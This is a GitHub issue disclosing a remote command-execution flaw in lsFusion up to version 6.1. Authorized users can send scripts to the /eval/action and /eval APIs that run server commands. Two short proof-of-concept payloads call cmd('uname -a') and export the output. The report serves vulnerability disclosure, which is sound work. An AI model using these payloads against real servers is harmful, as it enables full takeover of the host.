-
Notifications
You must be signed in to change notification settings - Fork 35
Open
Description
BUG_Author: R1ckyZ
Affected Version: lsFusion ≤ 6.1
Vendor: lsfusion GitHub Repository
Software: lsfusion
Vulnerability Files:
server/src/main/java/lsfusion/server/physics/admin/interpreter/action/RunCommandAction.java
Description:
The client accesses the server via the /eval/action and /eval APIs. An authorized user can pass a script parameter to execute scripts. The server exposes functions for command execution, file reading, and file writing. An authorized user can therefore execute arbitrary commands, effectively gaining full access to the server.
Proof of Concept:
- Access the API
/eval/actionand pass in the following script value:
{cmd('uname -a', NULL, NULL, TRUE ); }
EXPORT FROM cmdOut[]();
- Alternatively, access the API
/evaland pass in the following script value:
run() {
cmd('uname -a', NULL, NULL, TRUE );
EXPORT FROM cmdOut[]();
}

Metadata
Metadata
Assignees
Labels
No labels